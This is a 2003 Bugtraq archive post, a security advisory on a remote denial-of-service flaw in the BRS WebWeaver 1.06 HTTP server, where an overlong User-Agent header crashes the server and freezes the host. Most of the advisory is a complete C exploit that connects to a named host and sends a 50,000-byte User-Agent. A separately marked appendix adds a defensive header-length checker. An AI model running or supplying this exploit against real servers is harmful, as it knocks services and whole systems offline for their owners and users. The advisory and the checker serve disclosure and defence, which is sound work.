Bugtraq mailing list archives

BRS WebWeaver 1.06 remote DoS vulnerability
From: d4rkgr3y <d4rk () securitylab ru>
Date: Sat, 1 Nov 2003 12:03:33 +0300

/**********************************************************
*
*               m00 security advisory #004
*
*        BRS WebWeaver remote DoS vulnerability
*
*                    www.m00security.org
*
************************************************************/

---------------------------------
Product: BRS WebWeaver
Version: 1.06 and below
OffSite: www.brswebweaver.com
---------------------------------

Overview:

BRS WebWeaver is an HTTP Server with support for
CGI, ISAPI, SSI, IP Address based security, Realm
based security, configurable users and groups, as well
as basic HTTP capabilities. 

Problem description:

BRS WebWeaver httpd crashes and freezes the whole system
when it gets a request that contains a long string in the
`User-Agent` field. The vulnerability doesn't seem
exploitable, except for DoS.

Exploit:
Lame cpp exploit code that demonstrates the possibility of a
remote Denial-of-Service attack against BRS WebWeaver.

/*
 *  BRS WebWeaver v.1.06 remote DoS exploit
 *
 * -d4rkgr3y [d4rk () securitylab ru]
 *
 */

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>

#define port 80

main(int argc, char **argv) {
        struct hostent *hs;
        struct sockaddr_in sock;
        int sockfd, i;
        const c = 50000;
        char request[50150] =
                "GET /m00-r0cz HTTP/1.0\n"
                "Accept: */*\n"
                "Accept-Language: jp\n"
                "Accept-Encoding: gzip, deflate\n"
                "Host: m00security.org\n"
                "User-Agent: ";
        printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");

        if (argc!=2){
                printf("usage\n %s hostname\n\n",argv[0]);
                exit(1);
        }

        //memset((request+98),0x41,c);
        memset((request+strlen(request)),0x41,c);
        /* l33t ;] */
        request[strlen(request)] = 0x0a;
        request[strlen(request)] = 0x43;
        request[strlen(request)] = 0x6f;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x63;
        request[strlen(request)] = 0x74;
        request[strlen(request)] = 0x69;
        request[strlen(request)] = 0x6f;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x3a;
        request[strlen(request)] = 0x20;
        request[strlen(request)] = 0x4b;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x70;
        request[strlen(request)] = 0x2d;
        request[strlen(request)] = 0x41;
        request[strlen(request)] = 0x6c;
        request[strlen(request)] = 0x69;
        request[strlen(request)] = 0x76;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x0a;
        request[strlen(request)] = 0x0a;

        bzero(&sock, sizeof(sock));
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
                if ((hs=gethostbyname(argv[1]))==NULL) {
                        printf("damn");
                        exit(1);
                }
                printf("~ Host resolved.\n");
                sock.sin_family = hs->h_addrtype;
                memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
        }
        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
                perror("damn");  exit(0);
        }

        if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
                perror("damn"); exit(0);
        }
        printf("~ Socket connected\n");
        printf("~ Sending evil code... ");
        write(sockfd,request,strlen(request));
        printf("done\n\n");
        close(sockfd);
}
/* m00 */

(c) m00 Security / d4rkgr3y [d4rk () securitylab ru]
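
A defensive counterpart to the problem described in the advisory, added here as an example that is not part of the original post and is not WebWeaver code: a header-length check that a server or filtering proxy can run on the bytes received so far, before any header is copied or parsed. The function names, the 8190-byte line cap and the 64 KiB block cap are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Limits assumed for this example; they are not WebWeaver settings. */
#define MAX_HEADER_LINE  8190u   /* bytes in one line, CR included */
#define MAX_HEADER_BLOCK 65536u  /* request line plus all headers */

enum hdr_verdict { HDR_OK, HDR_INCOMPLETE, HDR_LINE_TOO_LONG, HDR_BLOCK_TOO_LONG };

/* Scan the bytes received so far in place (CRLF or bare LF). An oversized line
 * is reported once it passes the cap, before its newline has even arrived. */
enum hdr_verdict check_headers(const char *buf, size_t len, size_t *bad_off) {
    size_t line_start = 0;
    for (size_t i = 0; i < len; i++) {
        if (i >= MAX_HEADER_BLOCK) return HDR_BLOCK_TOO_LONG;
        if (buf[i] != '\n') {
            if (i - line_start >= MAX_HEADER_LINE) {
                if (bad_off) *bad_off = line_start;
                return HDR_LINE_TOO_LONG;
            }
            continue;
        }
        size_t line_len = i - line_start;
        if (line_len > 0 && buf[i - 1] == '\r') line_len--;
        if (line_len == 0 && line_start > 0) return HDR_OK; /* end of headers */
        line_start = i + 1;
    }
    return HDR_INCOMPLETE;
}

/* Constructed sample: a request whose User-Agent value is ua_len bytes long. */
enum hdr_verdict demo_user_agent(size_t ua_len, size_t *bad_off) {
    static char req[70000];
    const char *head = "GET / HTTP/1.0\nHost: example.test\nUser-Agent: ";
    size_t n = strlen(head);
    if (ua_len > sizeof req - n - 2) ua_len = sizeof req - n - 2;
    memcpy(req, head, n);
    memset(req + n, 'A', ua_len);
    memcpy(req + n + ua_len, "\n\n", 2);
    return check_headers(req, n + ua_len + 2, bad_off);
}

int main(void) {
    size_t off = 0;
    int v = demo_user_agent(50000, &off);
    printf("verdict=%d, oversized line starts at byte %zu\n", v, off);
    return 0;
}
```

A caller that gets `HDR_LINE_TOO_LONG` or `HDR_BLOCK_TOO_LONG` should stop reading and close the connection or answer with an error status; `HDR_INCOMPLETE` means more bytes are needed before a decision can be made.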


